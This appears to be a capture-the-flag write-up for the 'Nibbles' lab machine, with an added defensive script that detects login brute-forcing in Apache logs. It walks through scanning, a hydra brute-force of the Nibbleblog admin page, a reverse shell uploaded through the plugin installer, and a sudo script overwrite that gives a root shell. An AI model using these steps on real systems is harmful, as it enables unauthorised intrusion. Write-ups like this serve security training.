Nibbles is an easy Linux box that can be exploited by brute-forcing the administrator's login page. Once logged in, a file upload vulnerability lets you install a malicious plugin. Privileges can be escalated by replacing a monitoring script that can be run with sudo rights.
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.25.188

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The first thing I checked was the webserver. The user is presented with an otherwise blank page that displays "Hello world!". Viewing the page source (Ctrl+U) reveals the following comment:
/nibbleblog/ directory. Nothing interesting here!
Naturally, you can navigate to: http://10.129.25.188/nibbleblog/.
Next, as usual, the website was brute-forced to discover hidden files and directories with dirb:
dirb http://10.129.25.188/nibbleblog/ -X .php
The results were as follows:
+ http://10.129.25.188/nibbleblog/admin.php (CODE:200|SIZE:1401)
Brute-Forcing the Login Page
Navigating here results in a login page. This can be bruteforced with hydra like this:
hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV -f -t 2 10.129.25.188 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

[ATTEMPT] target 10.129.25.188 - login "admin" - pass "password" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target 10.129.25.188 - login "admin" - pass "123456" - 2 of 10000 [child 1] (0/0)
Hydra reports two candidate passwords, but both are incorrect. This is probably deliberate: the application returns a different error message for these credentials, so the failure string "login_error" does not match and hydra counts them as successes. By simply guessing you will get in with admin / nibbles. You are now presented with a standard dashboard.
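From the defender's side, the hydra run above leaves an obvious trace in the Apache access log: a burst of POST requests to /nibbleblog/admin.php from a single client. The following is an added example (not part of the original writeup) that parses combined-format log lines and flags clients exceeding a threshold of login POSTs within a sliding time window; the log lines, IPs, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

LOGIN_PATH = "/nibbleblog/admin.php"

# Apache combined log: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, datetime, method, path, status) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def find_bruteforce(lines, threshold=10, window=60):
    """Return {ip: max_hits} for clients that POSTed to LOGIN_PATH at least
    `threshold` times within any `window`-second span (query string ignored)."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3].split("?")[0] == LOGIN_PATH:
            attempts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # two-pointer sliding window
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            hits = end - start + 1
            if hits >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), hits)
    return flagged


def _line(ip, second, method, path, status):
    # Constructed sample log line (hypothetical addresses and timestamps).
    return (f'{ip} - - [10/Mar/2023:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 1401 "-" "Mozilla/5.0"')


# Constructed sample: 12 login POSTs in 12 seconds from one client,
# plus ordinary browsing and a single login from another.
SAMPLE_LOG = [_line("10.10.14.5", s, "POST", LOGIN_PATH, 200) for s in range(12)]
SAMPLE_LOG += [_line("10.10.14.9", 5, "GET", "/nibbleblog/", 200),
               _line("10.10.14.9", 30, "POST", LOGIN_PATH, 302)]
```

Run against a real access.log, the same check works line by line with `find_bruteforce(open("access.log"))`; a lower threshold catches the `-t 2` slow variant shown above, at the cost of more false positives.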
A google search showed that:
Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.
Go to Plugins > Install and you will be able to upload a picture. This upload is vulnerable and you can simply upload a reverse shell. After clicking "Save changes" it will display some warnings. You can ignore these and continue to http://10.129.25.190/nibbleblog/content/private/plugins/about/. It lists the PHP file you just uploaded, and clicking it opens a reverse shell as the user nibbler. The user.txt is in the home directory of this user.
The next step is privilege escalation. I recommend running linpeas, which gives a great deal of information, such as:
User nibbler may run the following commands on Nibbles: (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
I simply created this file:
$ cat monitor.sh
#!/bin/bash
/bin/bash
echo "worked"
After running sudo /home/nibbler/personal/stuff/monitor.sh you obtain a root shell and can open